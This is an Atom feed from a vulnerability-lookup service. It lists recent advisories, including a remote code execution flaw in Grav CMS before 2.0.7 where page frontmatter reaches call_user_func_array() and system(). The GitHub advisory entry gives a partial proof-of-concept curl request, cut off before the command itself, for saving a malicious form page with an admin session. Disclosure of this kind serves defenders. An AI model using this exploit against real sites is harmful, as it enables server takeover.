<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-10T04:09:34.700666+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-356455</id>
    <title>EUVD-2026-356455</title>
    <updated>2026-10-10T04:09:34.703017+00:00</updated>
    <content>EUVD-2026-356455</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-356455"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-64850</id>
    <title>fkie_cve-2026-64850</title>
    <updated>2026-10-10T04:09:34.703069+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Grav is a file-based Web platform. Prior to 2.0.7, Grav Blueprint::dynamicData() in system/src/Grav/Common/Data/Blueprint.php sends an editor-controlled Class::method provider and arguments to call_user_func_array() without rejecting dangerous callback parameters. An account with admin.pages or api.pages.write can use Grav\Common\Utils::arrayFilterRecursive() as a trampoline with system as the callback, place a command in page frontmatter, and execute that command as the web server user when the page is viewed. This issue is fixed in version 2.0.7.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-64850"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-fj2p-qj2f-74v5</id>
    <title>GHSA-fj2p-qj2f-74v5 — Grav: Remote code execution via unrestricted callable in Blueprint::dynamicData()</title>
    <updated>2026-10-10T04:09:34.703101+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Packagist: getgrav/grav</p>
<p>### Summary
An account with the `admin.pages` permission (or `api.pages.write`) can run shell
commands on the server. The command executes whenever anyone — including an
unauthenticated visitor — opens the page.</p>
<p>### Details
`Blueprint::dynamicData()` (system/src/Grav/Common/Data/Blueprint.php:426) passes
a `Class::method` string and its arguments straight to `call_user_func_array()`
with no allowlist. The form plugin runs page frontmatter through this path
(form/classes/Form.php:432), so a page author controls the input.
`Grav\Common\Utils::arrayFilterRecursive($source,$fn)`
(system/src/Grav/Common/Utils.php:1169) is a public static that calls
`$fn($key,$value)`, so passing `system` as `$fn` and a command as the array key
runs the command.</p>
<p>### PoC
Placeholders: `&lt;BASE_URL&gt;` the site; `&lt;SESSION_COOKIE&gt;` an admin session cookie
for an account with `admin.pages`; `&lt;ADMIN_NONCE&gt;` the `admin-nonce` on any admin
page (`window.GravAdmin.config.admin_nonce`).</p>
<p>Save a "form" page whose field carries the callable directive:</p>
<p>curl '&lt;BASE_URL&gt;/admin/pages/rcepoc' \
      -H 'Cookie: &lt;SESSION_COOKIE&gt;' \
      --data-urlencode 'task=save' \
      --data-urlencode 'admin-nonce=&lt;ADMIN_NONCE&gt;' \
      --data-urlencode 'data[folder]=rcepoc' \
      --data-urlencode 'data[name]=form' \
      --data-urlencode 'data[title]=x' \
      --data-urlencode 'data[content]=hi' \
      --data-urlencode "data[frontmatter]=forms:
      x:
        fields:
          y:
            type: text…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-fj2p-qj2f-74v5"/>
  </entry>
</feed>
